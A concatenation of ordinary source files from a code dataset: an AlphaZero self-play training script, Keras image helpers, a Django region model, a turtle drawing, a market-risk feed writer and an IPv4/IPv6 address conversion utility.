dist_metric, value_metric,\n victory_0, victory_1, victory_2\n )\n\n elapsed_time_training = time.time() - start_training\n \n current_weights = current_model.network.get_weights()\n current_model.network = None\n\n\n with open(file_name, 'a') as f:\n print(' Time elapsed of training:',\n elapsed_time_training, file=f)\n \n print(' Total loss:', loss, file=f)\n print(' Dist. error:', dist_metric, file=f)\n print(' Value error:', value_metric, file=f)\n\n return current_weights, training_tuple\n\n def _evaluation(self, current_model, cur_weights, old_weights,\n data_net_vs_net_eval, n_games_evaluate, victory_rate, file_name):\n\n with open(file_name, 'a') as f:\n print('MODEL EVALUATION - Network vs. Old Network', file=f)\n\n # The current network faces the previous one.\n # If it does not win victory_rate % it completely\n # discards the current network.\n\n victory_0_eval = 0 # Draw\n victory_1_eval = 0 # Current model\n victory_2_eval = 0 # Old model\n\n start_eval = time.time()\n\n old_model = current_model.clone()\n # We do n_games//2 parallel games. Each of the operations we switch \n # who is the first player to avoid first player winning bias.\n\n # ProcessPoolExecutor() will take care of joining() and closing()\n # the processes after they are finished.\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (current_model, old_model, 'en', cur_weights, old_weights) \n for _ in range(n_games_evaluate//2)\n )\n results_1 = executor.map(self._play_single_game, args)\n\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (old_model, current_model, 'en', old_weights, cur_weights) \n for _ in range(n_games_evaluate//2)\n ) \n results_2 = executor.map(self._play_single_game, args)\n \n for result in results_1:\n if result[1] == 1:\n victory_1_eval += 1\n elif result[1] == 2:\n victory_2_eval += 1\n else:\n victory_0_eval += 1\n\n for result in results_2:\n if result[1] == 2:\n victory_1_eval += 1\n elif result[1] == 1:\n victory_2_eval += 1\n else:\n victory_0_eval += 1\n \n elapsed_time_eval = time.time() - start_eval\n\n data_net_vs_net_eval.append(\n (victory_0_eval, victory_1_eval, victory_2_eval)\n )\n\n necessary_won_games = (victory_rate * n_games_evaluate) / 100\n\n if victory_1_eval < necessary_won_games:\n with open(file_name, 'a') as f:\n print(' New model is worse...', file=f)\n print(' New model victories:', victory_1_eval, file=f)\n print(' Old model victories:', victory_2_eval, file=f)\n print(' Draws:', victory_0_eval, file=f)\n print(' Time elapsed in evaluation (Net vs. Net):', \n elapsed_time_eval, file=f)\n print(' Average time of a game: ', \\\n elapsed_time_eval / n_games_evaluate, \\\n 's', sep = '', file=f)\n\n return False\n else:\n with open(file_name, 'a') as f:\n print(' New model is better!', file=f)\n print(' New model victories:', victory_1_eval, file=f)\n print(' Old model victories:', victory_2_eval, file=f)\n print(' Draws:', victory_0_eval, file=f)\n print(' Time elapsed in evaluation (Net vs. 
Net):', \n                    elapsed_time_eval, file=f)\n                print('    Average time of a game: ', \\\n                    elapsed_time_eval / n_games_evaluate, \\\n                    's', sep = '', file=f)\n\n            return True\n\n    def play_alphazero(self, current_model, current_weights, use_UCT_playout, \n        epochs, alphazero_iterations, mini_batch, n_training_loop, n_games, \n        n_games_evaluate, victory_rate, dataset_size, iteration):\n        \"\"\"\n        - current_model is an instance of AlphaZeroPlayer.\n        - epochs is the number of epochs used in the training stage.\n        - alphazero_iterations is the total number of iterations of the \n          learning algorithm: selfplay -> training loop -> evaluate network.\n        - mini_batch is the number of data points sampled from the whole dataset for \n          one single training iteration.\n        - n_training_loop is the number of training iterations after self-play.\n        - n_games is the number of games played in the self-play stage.\n        - n_games_evaluate is the number of games played in the evaluation\n          stage.\n        - victory_rate is the % of victories necessary for the new network to\n          overwrite the previous one.\n        - dataset_size is the max number of games stored in memory for \n          training. \n        - iteration is an integer referring to which iteration AZ is at the\n          moment.\n        \"\"\"\n\n        \n\n        file_name = str(current_model.n_simulations) + '_' + str(n_games) \\\n            + '_' + str(alphazero_iterations) + '_' \\\n            + str(self.conv_number) + '_' + str(use_UCT_playout) + '.txt'\n\n        dataset_file = str(current_model.n_simulations) + '_' + str(n_games) \\\n            + '_' + str(alphazero_iterations) + '_' \\\n            + str(self.conv_number) + '_' + str(use_UCT_playout) \\\n            + '_dataset'\n\n        current_weights_file = str(current_model.n_simulations) + '_' \\\n            + str(n_games) + '_' + str(alphazero_iterations) + '_' \\\n            + str(self.conv_number) + '_' + str(use_UCT_playout) \\\n            + '_currentweights'\n        old_weights_file = str(current_model.n_simulations) + '_' \\\n            + str(n_games) + '_' + str(alphazero_iterations) + '_' \\\n            + str(self.conv_number) + '_' + str(use_UCT_playout) \\\n            + '_oldweights'\n        \n\n        with open(file_name, 'a') as f:\n            print('ALPHAZERO ITERATION -', iteration, file=f)\n        \n        process = psutil.Process(os.getpid())\n        memory = process.memory_info().rss / 1000000\n        with open(file_name, 'a') as f:\n            print('Current usage of RAM (mb): ', memory, file=f)\n\n        # dataset_for_network stores a list of info used as input for the \n        # network.\n        # A list of: states of the game, distribution probability of the state\n        # returned by the UCT and who won the game this state is in.\n        dataset_for_network = []\n\n        # If there is a file that contains data for training, read it\n        if os.path.exists(dataset_file):\n            with open(dataset_file, 'rb') as file:\n                dataset_for_network = pickle.load(file)\n\n        if current_weights == None:\n            raise Exception('You must run generate_default_weights.py.' + \\\n                    ' This is needed for the first call of' + \\\n                    ' selfplay in order for all concurrent calls' + \\\n                    ' to run with the same network weights.'\n                    )\n\n        # Stores data from net vs net in training for later analysis.\n        data_net_vs_net_training = []\n        # Stores data from net vs net in evaluation for later analysis.\n        data_net_vs_net_eval = []\n\n        start = time.time()\n\n        #\n        #\n        # Self-play\n        #\n        #\n\n        victory_0, victory_1, victory_2 = self._selfplay(\n            current_model,\n            current_weights, \n            dataset_for_network, \n            n_games,\n            file_name\n        )\n        \n        # This means all of the selfplay games (from the first iteration) \n        # ended in a draw.\n        # This is not interesting since it does not add any valuable info \n        # for the network training. 
Stops this iteration.\n        if len(dataset_for_network) == 0:\n            with open(file_name, 'a') as f:\n                print('    All selfplay games ended in a draw.' \n                        + ' Stopping current iteration.', file=f)\n            return\n\n        #\n        #\n        # Training\n        #\n        #\n\n        \n\n        #old_weights = None\n        #old_model = current_model.clone()\n\n        # Save the model weights before training for later evaluation\n        with open(old_weights_file, 'wb') as file:\n            pickle.dump(current_weights, file)\n\n        current_dataset_size = len(dataset_for_network)\n        to_delete = current_dataset_size - dataset_size\n\n        # If the current dataset is bigger than dataset_size, then remove\n        # the oldest games accordingly.\n        if current_dataset_size > dataset_size:\n            del dataset_for_network[:to_delete]\n\n        # This is a little hack so that tensorflow does not get stuck in a\n        # deadlock at net evaluation. Apparently, for parallel calls to work\n        # with tf.keras models, no tf.keras models should be instantiated in\n        # the main process (in the selfplay stage, for example, we\n        # instantiate the models inside each parallel process). Therefore, \n        # we call the training stage in a single \"parallel\" call; this way,\n        # the define_model() will be called in a separate process rather than\n        # the main one so we are able to run the net evaluation later with no\n        # deadlocks.\n        with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n            # Specify which arguments will be used for each parallel call\n            args = (\n                (current_model,\n                current_weights,\n                dataset_for_network,\n                n_training_loop, \n                mini_batch,\n                epochs,\n                victory_0, \n                victory_1, \n                victory_2, \n                file_name) \n                for _ in range(1)\n            )\n            # 2-tuple = (current_weights, training_tuple) \n            results = executor.map(self._training, args)\n\n        for result in results:\n            current_weights = result[0]\n            training_tuple = result[1]\n\n        data_net_vs_net_training.append(training_tuple)\n\n        # Save the current model weights after training for later evaluation.\n        # This seems redundant since we read from file right after, but it is\n        # stored in file in case of unexpected problems for logging purposes.\n        with open(current_weights_file, 'wb') as file:\n            pickle.dump(current_weights, file)\n\n        # Since the selfplay data is not important from now on, free the \n        # memory and save the data in a file for later usage in the next\n        # AZ iteration.\n        with open(dataset_file, 'wb') as file:\n            pickle.dump(dataset_for_network, file)\n        dataset_for_network = []\n\n        # Load from file current and old weights for evaluation\n        if os.path.exists(current_weights_file):\n            with open(current_weights_file, 'rb') as file:\n                current_weights = pickle.load(file)\n        else:\n            raise Exception('Current weights file was not located.')\n\n        if os.path.exists(old_weights_file):\n            with open(old_weights_file, 'rb') as file:\n                old_weights = pickle.load(file)\n        else:\n            raise Exception('Old weights file was not located.')\n\n        old_model = current_model.clone()\n\n        #\n        # \n        # Model evaluation\n        #\n        #\n\n        won = self._evaluation(\n            current_model,\n            current_weights,\n            old_weights,\n            data_net_vs_net_eval, \n            n_games_evaluate, \n            victory_rate,\n            file_name\n        )\n\n        if not won:\n            # New model is worse, therefore we can copy old_model weights\n            # to current_model to be used in the next AZ iteration.\n            # This way, we are discarding everything current_model learned \n            # during the learning stage because it was worse than old_model.\n            current_weights = old_weights\n            # Save the current model weights with the old weights since it has\n            # lost against the old weights.\n            with open(current_weights_file, 
'wb') as file:\n                pickle.dump(current_weights, file)\n\n        # Saves this iteration's data to file\n        stats = Statistic(\n            data_net_vs_net_training, \n            data_net_vs_net_eval, \n            None, \n            n_simulations = current_model.n_simulations, \n            n_games = n_games, \n            alphazero_iterations = alphazero_iterations, \n            use_UCT_playout = use_UCT_playout, \n            conv_number = self.conv_number\n        )\n        stats.save_to_file(iteration, won = won)\n        stats.save_model_to_file(current_weights, iteration, won = won)\n        stats.save_player_config(current_model, iteration, won = won)\n\n        # At this point, we don't need the local files that store the current\n        # and old weights anymore since the weights are properly stored in\n        # another folder, so delete them.\n        os.remove(current_weights_file)\n        os.remove(old_weights_file)\n\n        elapsed_time = time.time() - start\n        import gc\n        gc.collect()\n\n        process = psutil.Process(os.getpid())\n        memory = process.memory_info().rss / 1000000\n        with open(file_name, 'a') as f:\n            print('Time elapsed of this AZ iteration: ', \n                elapsed_time, file=f)\n            print('Current usage of RAM (mb): ', memory, file=f)\n            print(file=f)\n        \n\n    def play_network_versus_UCT(self, network, weights, stat, networks_dir, \n        prefix_name, UCTs_eval, n_games_evaluate):\n        \"\"\"\n        Play the network against three baseline UCTs and save all the data\n        accordingly.\n        \n        - network is an AlphaZeroPlayer that won against a previous network \n          and for evaluation purposes will now face the UCTs.\n        - stat is an instance of Statistics that stores data related to this\n          player. It is used to generate a report.\n        - networks_dir is the directory where all info about the current \n          experiment is located.\n        - prefix_name is a string used to identify the configs used in this \n          experiment, as well as the AZ iteration it corresponds to.\n        - UCTs_eval is a list of Vanilla_UCT players used in evaluation.\n        - n_games_evaluate is the number of games played between the network\n          and the vanilla UCTs.\n        \"\"\"\n\n        start = time.time()\n\n        file_name = networks_dir + '/results_uct/'\n        file_name_data = networks_dir + '/results_uct/' + prefix_name + '_data'\n\n        # Create the target directory if it is not created yet\n        if not os.path.exists(file_name):\n            os.makedirs(file_name)\n\n        file_name = file_name + prefix_name + '_log_uct.txt'\n        # Stores data from net vs uct in evaluation for later analysis.\n        data_net_vs_uct = []\n\n        # List of victories against each vanilla UCT\n        victory_0_eval = [0 for i in range(len(UCTs_eval))]\n        victory_1_eval = [0 for i in range(len(UCTs_eval))]\n        victory_2_eval = [0 for i in range(len(UCTs_eval))]\n\n        iteration = prefix_name.rsplit('_', 1)[-1]\n\n        with open(file_name, 'a') as f:\n            print('ALPHAZERO ITERATION -', iteration, file=f)\n\n        process = psutil.Process(os.getpid())\n        memory = process.memory_info().rss / 1000000\n        with open(file_name, 'a') as f:\n            print('Current usage of RAM (mb): ', memory, file=f)\n\n        for ucts in range(len(UCTs_eval)):\n            with open(file_name, 'a') as f:\n                print('MODEL EVALUATION - Network vs. UCT - ', \n                    UCTs_eval[ucts].n_simulations,' simulations', file=f)\n\n            start_evaluate_uct = time.time()\n            # We do n_games//2 parallel games. 
Each of the operations we switch \n # who is the first player to avoid first player winning bias.\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (network, UCTs_eval[ucts], 'eu', weights, None) \n for _ in range(n_games_evaluate//2)\n )\n results_1 = executor.map(self._play_single_game, args)\n\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (UCTs_eval[ucts], network, 'eu', None, weights) \n for _ in range(n_games_evaluate//2)\n ) \n results_2 = executor.map(self._play_single_game, args)\n\n for result in results_1:\n if result[1] == 1:\n victory_1_eval[ucts] += 1\n elif result[1] == 2:\n victory_2_eval[ucts] += 1\n else:\n victory_0_eval[ucts] += 1\n\n for result in results_2:\n if result[1] == 2:\n victory_1_eval[ucts] += 1\n elif result[1] == 1:\n victory_2_eval[ucts] += 1\n else:\n victory_0_eval[ucts] += 1\n\n elapsed_time_evaluate_uct = time.time() - start_evaluate_uct\n\n with open(file_name, 'a') as f:\n print(' Net vs UCT - Network won', \n victory_1_eval[ucts],'time(s).', file=f)\n print(' Net vs UCT - UCT won', \n victory_2_eval[ucts],'time(s).', file=f)\n print(' Net vs UCT - Draws:', \n victory_0_eval[ucts], file=f)\n print(' Time elapsed in evaluation (Net vs. UCT):', \n elapsed_time_evaluate_uct, file=f)\n print(' Average time of a game: ', \\\n elapsed_time_evaluate_uct / n_games_evaluate, \\\n 's', sep = '', file=f)\n\n gc.collect()\n elapsed_time = time.time() - start\n\n process = psutil.Process(os.getpid())\n memory = process.memory_info().rss / 1000000\n with open(file_name, 'a') as f:\n print('Time elapsed of this evaluation: ', elapsed_time, file=f)\n print('Current usage of RAM (mb): ', memory, file=f)\n print(file=f)\n\n list_of_n_simulations = [uct.n_simulations for uct in UCTs_eval]\n # Saving data\n data_net_vs_uct.append(\n (victory_0_eval, victory_1_eval, victory_2_eval, \n list_of_n_simulations)\n )\n stat.data_net_vs_uct = data_net_vs_uct\n # Save the data of uct\n with open(file_name_data, 'wb') as file:\n pickle.dump(data_net_vs_uct, file)\n # Save the updated stats file\n with open(networks_dir + '/results_uct/' + prefix_name, 'wb') as file:\n pickle.dump(stat.__dict__, file)\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":36305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"425542720","text":"import matplotlib.pyplot as plt\r\nfrom keras.preprocessing import image\r\nfrom PIL import Image\r\nfrom glob import glob\r\nimport numpy as np\r\nimport os\r\n\r\nclass plot:\r\n\r\n def __init__(self, histo, row=1, col=2):\r\n\r\n self.histo = histo\r\n self.row, self.col = row, col\r\n\r\n self.plot_acc()\r\n self.plot_loss()\r\n\r\n plt.show()\r\n\r\n def plot_acc(self):\r\n histo = self.histo\r\n plt.plot(histo.history['acc'])\r\n plt.plot(histo.history['val_acc'])\r\n plt.title('Model Accuracy')\r\n plt.xlabel('Epochs')\r\n plt.ylabel('Accuracy')\r\n plt.legend(['Train', 'Test'], loc=0)\r\n\r\n def plot_loss(self):\r\n histo = self.histo\r\n plt.plot(histo.history['loss'])\r\n plt.plot(histo.history['val_loss'])\r\n plt.title('Model Loss')\r\n plt.xlabel('Epochs')\r\n plt.ylabel('loss')\r\n plt.legend(['Train', 'Test'], loc=0)\r\n\r\nclass preprocess:\r\n\r\n def __init__(self, paths, size = 250, is_sub = True, idx = 20, format='jpg'):\r\n\r\n self.paths, self.size = 
paths, size\r\n\r\n format = format.lower()\r\n self.format, self.idx = format, idx\r\n\r\n if is_sub:\r\n images = np.asarray([])\r\n for path, _, _ in os.walk(paths):\r\n image_dir = np.asarray(glob(os.path.join(path, '*.'+format)))\r\n images = np.concatenate([images, image_dir])\r\n data = [image.load_img(img) for img in images]\r\n\r\n else:\r\n images = glob(os.path.join(paths, '*.' + format))\r\n data = [image.load_img(img) for img in images]\r\n\r\n self.data = data\r\n\r\n def crop(self):\r\n\r\n data = self.data\r\n cropped_images = []\r\n\r\n for img in data:\r\n w, h = img.size\r\n s = min(w, h)\r\n x = w - s // 1.5\r\n y = h - s // 1.5\r\n imgs = img.crop((x, y, s, s))\r\n cropped_images.append(imgs)\r\n\r\n return cropped_images\r\n\r\n def resize(self, cropped = False, w = 800, h = 400):\r\n size = self.size\r\n\r\n\r\n if cropped:\r\n data = self.crop()\r\n resized = [image.img_to_array(data[img].resize((w, h), Image.ANTIALIAS)) / 255.0 for img in range(len(data))]\r\n\r\n else:\r\n data = self.data\r\n resized = [image.img_to_array(data[img].resize((w, h), Image.ANTIALIAS)) / 255.0 for img in range(len(data))]\r\n\r\n return resized\r\n\r\n def labeling(self, number_of = 100, label = 2):\r\n\r\n rep = 0\r\n lis = []\r\n while rep < label:\r\n data = np.asarray(rep for _ in range(number_of))\r\n total = np.concatenate([lis, data])\r\n rep += 1\r\n\r\n return total\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n path = './'\r\n pre = preprocess(paths = path, is_sub=False, format = 'jpg')\r\n img = pre.resize(w = 800, h = 400)\r\n\r\n from matplotlib import image\r\n image.imsave('룰루2.jpg', img)\r\n","sub_path":"keras/개인프로젝트/ChatBot/AI/EDItH_sub_pack.py","file_name":"EDItH_sub_pack.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"571652829","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nRUSSIAN_TZ = (\n ('Europe/Kaliningrad', _('Kaliningrad Time (MSK-1)')),\n ('Europe/Moscow', _('Moscow Time (MSK)')),\n ('Asia/Yekaterinburg', _('Yekaterinburg Time (MSK+2)')),\n ('Asia/Omsk', _('Omsk Time (MSK+3)')),\n ('Asia/Krasnoyarsk', _('Krasnoyarsk Time (MSK+4)')),\n ('Asia/Irkutsk', _('Irkutsk Time (MSK+5)')),\n ('Asia/Yakutsk', _('Yakutsk Time (MSK+6)')),\n ('Asia/Vladivostok', _('Vladivostok Time (MSK+7)')),\n ('Asia/Magadan', _('Magadan Time (MSK+8)')),\n)\n\n\nclass Region(models.Model):\n code = models.SmallIntegerField(_('code'), unique=True)\n abbr = models.CharField(_('abbreviation'), max_length=6, unique=True)\n tz = models.CharField(_('time zone'), max_length=20, choices=RUSSIAN_TZ)\n name = models.CharField(_('name'), max_length=255, unique=True)\n g_name = models.CharField(_('genitive name'), max_length=255,\n blank=True, null=True)\n\n class Meta:\n db_table = 'cms_region'\n ordering = ['code']\n verbose_name = _('region')\n verbose_name_plural = _('regions')\n permissions = (\n ('manage_content', _('can manage content of region')),\n )\n\n def __unicode__(self):\n return self.name\n\n\nclass RegionDepended(models.Model):\n region = models.ForeignKey('Region')\n\n class Meta:\n abstract = True\n","sub_path":"cms/regions/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"5344860","text":"import turtle as t\n\nc=[\"red\",\"blue\",\"gray\",\"green\",\"pink\",\"black\",\"white\",\"sky 
blue\",\"orange\"]\n\nt.speed(10)\nfor i in range(8,-1,-1):\n t.fillcolor(c[i])\n t.begin_fill()\n t.circle(i*15)\n t.end_fill()\n\nt.filling()\n","sub_path":"turtle/graphics multi color filling2.py","file_name":"graphics multi color filling2.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"95713563","text":"'''\nPurpose :Market Risk feed files\nDepartment and Desk :IT\nRequester: :Natalie Austin\nDeveloper :Douglas Finkel / Henk Nel\nCR Number :264536\n\n'''\n\nimport ael, string, acm, MR_MainFunctions\n\nInsL = []\n\n# OPENFILE ##########################################################################################################\ndef OpenFile(temp,FileDir,Filename,PositionName,*rest):\n\n filename = FileDir + Filename\n outfile = open(filename, 'w')\n outfile.close()\n\n del InsL[:]\n InsL[:] = []\n \n return filename\n\n# OPENFILE ##########################################################################################################\n\n\n\n# WRITE - FILE ######################################################################################################\ndef Write(l,FileDir,Filename,PositionName,*rest):\n \n filename = FileDir + Filename\n \n ins = acm.FInstrument[l.insaddr.insaddr]\n inscurve = acm.FInstrument[l.float_rate.insaddr]\n# trade = acm.FTrade[t.trdnbr]\n context = acm.GetDefaultContext()\n \n if getattr(l, 'reset_type') not in ('Single'):\n LegList = 'CI_' + str(l.float_rate.insid) + '_'+ str(getattr(l, 'reset_period.count')) + str(getattr(l, 'reset_period.unit'))\n else: \n LegList = 'CI_' + str(l.float_rate.insid) + '_Maturity'\n \n if (LegList) not in InsL:\n InsL.append(LegList)\n \n outfile = open(filename, 'a')\n\t#Base record\n \n BAS = 'BAS'\n Volatility = 'Curve Index'\n OBJECT = 'Curve IndexSPEC'\n TYPE = 'Curve Index'\n \n if getattr(l, 'reset_type') not in ('Single'):\n IDENTIFIER = 'CI_' + str(l.float_rate.insid) + '_'+ str(getattr(l, 'reset_period.count')) + str(getattr(l, 'reset_period.unit'))\n else: \n IDENTIFIER = 'CI_' + str(l.float_rate.insid) + '_Maturity'\n if getattr(l, 'reset_type') not in ('Single'):\n NAME = ('CI_' + str(l.float_rate.insid) + '_'+ str(getattr(l, 'reset_period.count')) + str(getattr(l, 'reset_period.unit')))[0:50]\n else: \n NAME = ('CI_' + str(l.float_rate.insid) + '_Maturity')[0:50]\n\n try:\n DiscountCurveXREF = inscurve.MappedDiscountLink().Value().Link().YieldCurveComponent().Curve().Name()\n except:\n DiscountCurveXREF = inscurve.MappedDiscountLink().Value().Link().YieldCurveComponent().Name()\n \n HistoricalCrvXREF = str(l.float_rate.insid)+'_HistoricalCurve'\n RuleAtEndBUSD = '0'\n RuleAtEndCAL = ''\n RuleAtEndCONV = 'Regular'\n RuleAtEndRULE = 'Following'\n RuleAtStartBUSD = '0'\n RuleAtStartCAL = ''\n RuleAtStartCONV = 'Regular'\n RuleAtStartRULE = 'Preceding'\n\n if str(getattr(l, 'reset_period.count'))+str(getattr(l, 'reset_period.unit')) == '0Days':\n TermNB = ''\n elif getattr(l, 'reset_type') not in 'Single':\n TermNB = ''\n else:\n TermNB = str(getattr(l, 'reset_period.count'))\n\n if str(getattr(l, 'reset_period.count'))+str(getattr(l, 'reset_period.unit')) == '0Days': \n TermUNIT = 'Maturity'\n elif getattr(l, 'reset_type') not in 'Single':\n TermUNIT = 'Maturity'\n else:\n TermUNIT = str(getattr(l, 'reset_period.unit'))\n UnitCAL = ''\n \n # Get the daycount methd off the instruments leg\n for InsLegs in ael.Instrument[l.float_rate.insid].legs():\n UnitDAYC = 
MR_MainFunctions.DayCountFix(InsLegs.daycount_method)\n    \n    UnitPERD = 'simple'\n    UnitUNIT = '%'\n    # To set ZeroFloor default to 'False'\n    ZeroFloorFLAG = 'False'\n\n    outfile.write('%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\\n'% \n                  (BAS, Volatility, OBJECT, \n                  TYPE, IDENTIFIER, NAME, \n                  DiscountCurveXREF, HistoricalCrvXREF, \n                  RuleAtEndBUSD, RuleAtEndCAL, RuleAtEndCONV, \n                  RuleAtEndRULE, RuleAtStartBUSD, RuleAtStartCAL, \n                  RuleAtStartCONV, RuleAtStartRULE, TermNB, TermUNIT, \n                  UnitCAL, UnitDAYC, UnitPERD, UnitUNIT, ZeroFloorFLAG))\n\n    outfile.close()\n\n    return l.insaddr.insid\n    \n# WRITE - FILE ######################################################################################################\n\n","sub_path":"Python modules/MR_Curve_Index.py","file_name":"MR_Curve_Index.py","file_ext":"py","file_size_in_byte":5221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"300253703","text":"#!/usr/bin/env python3\n# coding: utf8\n\nimport os, sys, time\nimport signal, logging, json\n\n\nlogger = logging.getLogger('codegen')\n\ndatadir = os.path.join(os.getcwd(), \"data\")\n# registries = ('afrinic', 'apnic', 'arin', 'iana', 'ietf', 'lacnic', 'ripencc')\nregistries = ('iana', 'afrinic', 'apnic', 'arin', 'ietf', 'lacnic', 'ripencc')\n\nCOUNTRY_CODES = json.loads(open(\"data/country_codes.json\", \"rb\").read().decode(\"UTF-8\"))\n\n\n\"\"\"\nIANA\n\n----------   ---------------------------------------------\nRegistry     Area Covered\n----------   ---------------------------------------------\nAFRINIC      Africa Region\nAPNIC        Asia/Pacific Region\nARIN         Canada, USA, and some Caribbean Islands\nLACNIC       Latin America and some Caribbean Islands\nRIPE NCC     Europe, the Middle East, and Central Asia\n----------   ---------------------------------------------\n\"\"\"\n\nipv4_prefixs = (0,\n    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,\n    17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32\n)\n\nipv6_prefixs = (0, \n    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,\n    17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, \n    33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, \n    49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, \n    65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, \n    81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, \n    97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112,\n    113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128\n)\n\ndef ipv4_to_u64(s):\n    array = list(map(lambda sn: int(sn), s.split(\".\")))\n    assert(len(array) == 4)\n    for x in array:\n        assert(x >= 0 and x <= 255)\n    n = ( (array[0] & 0xff) << 24) \\\n        + ( (array[1] & 0xff) << 16) \\\n        + ( (array[2] & 0xff) << 8) \\\n        + ( (array[3] & 0xff) << 0)\n    return n\n\ndef ipv6_to_u128(s):\n    # WARN: addresses containing the dotted \".\" (embedded IPv4) notation are not supported yet\n    assert(\".\" not in s)\n    s = s.replace(\"::\", \"...\")\n    assert(s.count(\"...\") <= 1)\n    if s.count(\":\") != 7 and \"...\" in s:\n        if s.startswith(\"...\"):\n            s = s.replace(\"...\", \":\".join(list(\"0\"*(7-s.count(\":\")))) + \":\")\n        elif s.endswith(\"...\"):\n            s = s.replace(\"...\", \":\" + \":\".join(list(\"0\"*(7-s.count(\":\")))))\n        else:\n            s = s.replace(\"...\", \":\" + \":\".join(list(\"0\"*(6-s.count(\":\")))) + \":\")\n    tmp = s.split(\":\")\n    assert(len(tmp) == 8)\n    bits = \"\".join(list(map(lambda sn: bin(int(sn, 16)).replace(\"0b\", \"\").rjust(16, \"0\"), tmp)))\n    assert(len(bits) == 128)\n    array = []\n    pos = 0\n    
while 1:\n _bits = bits[pos: pos+8]\n if len(_bits) != 8:\n break\n array.append(int(_bits, 2))\n pos += 8\n _bits = None\n pos = None\n assert(len(array) == 16)\n for x in array:\n assert(x >= 0 and x <= 255)\n n = ( (array[ 0] & 0xff) << 120) \\\n + ( (array[ 1] & 0xff) << 112) \\\n + ( (array[ 2] & 0xff) << 104) \\\n + ( (array[ 3] & 0xff) << 96) \\\n + ( (array[ 4] & 0xff) << 88) \\\n + ( (array[ 5] & 0xff) << 80) \\\n + ( (array[ 6] & 0xff) << 72) \\\n + ( (array[ 7] & 0xff) << 64) \\\n + ( (array[ 8] & 0xff) << 56) \\\n + ( (array[ 9] & 0xff) << 48) \\\n + ( (array[10] & 0xff) << 40) \\\n + ( (array[11] & 0xff) << 32) \\\n + ( (array[12] & 0xff) << 24) \\\n + ( (array[13] & 0xff) << 16) \\\n + ( (array[14] & 0xff) << 8) \\\n + ( (array[15] & 0xff) << 0) \n return n\n\ndef u64_to_ipv4(n):\n assert(n >= 0 and n <= 4294967295)\n array = (\n ((n >> 24) & 0xff),\n ((n >> 16) & 0xff), \n ((n >> 8) & 0xff),\n ((n >> 0) & 0xff)\n )\n str_array = list(map(lambda n: str(n), array))\n return \".\".join(str_array)\n\ndef u128_to_ipv6(n):\n assert(n >= 0 and n <= 340282366920938463463374607431768211455)\n bits = bin(n).replace(\"0b\", \"\").rjust(128, \"0\")\n assert(len(bits) == 128)\n\n array = []\n pos = 0\n while 1:\n _bits = bits[pos: pos+16]\n if len(_bits) != 16:\n break\n array.append(hex(int(_bits, 2)).replace(\"0x\", \"\").rjust(4, \"0\") )\n pos += 16\n _bits = None\n pos = None\n assert(len(array) == 8)\n\n return \":\".join(array)\n\n\ndef ipv4_range_block(ipv4_addr, count=None, prefix=None):\n start = ipv4_to_u64(ipv4_addr)\n\n if type(count) == int:\n end = start+count\n assert(end <= 4294967295)\n return (start, start+count)\n\n if type(prefix) == int and prefix in ipv4_prefixs:\n end = max(start+2**(32-prefix) -1, 0)\n assert(end <= 4294967295)\n return (start, end)\n\n raise ValueError('Ooops ...')\n\n\ndef ipv6_range_block(ipv6_addr, count=None, prefix=None):\n start = ipv6_to_u128(ipv6_addr)\n if type(count) == int:\n end = start+count\n assert(end <= 340282366920938463463374607431768211455)\n return (start, end)\n \n if type(prefix) == int and prefix in ipv6_prefixs:\n end = max(start+2**(128-prefix) -1, 0)\n assert(end <= 340282366920938463463374607431768211455)\n return (start, end)\n\n raise ValueError('Ooops ...')\n\ndef ip_cidr(start_ip, end_ip):\n if \".\" in start_ip and \".\" in end_ip:\n # IPv4\n start_number = ipv4_to_u64(start_ip)\n end_number = ipv4_to_u64(end_ip)\n if start_number == end_number:\n return \"%s/%d\" % (start_ip, 32)\n elif start_number < end_number:\n return \"%s/%s\" % (start_ip, 32-len(bin(end_number - start_number).replace(\"0b\", \"\")))\n elif start_number > end_number:\n raise ValueError('Ooops ...')\n else:\n raise ValueError('Ooops ...')\n elif \":\" in end_ip :\n # IPv6\n start_number = ipv6_to_u128(start_ip)\n end_number = ipv6_to_u128(end_ip)\n if start_number == end_number:\n return \"%s/%d\" % (start_ip, 128)\n elif start_number < end_number:\n return \"%s/%s\" % (start_ip, 128-len(bin(end_number - start_number).replace(\"0b\", \"\")))\n elif 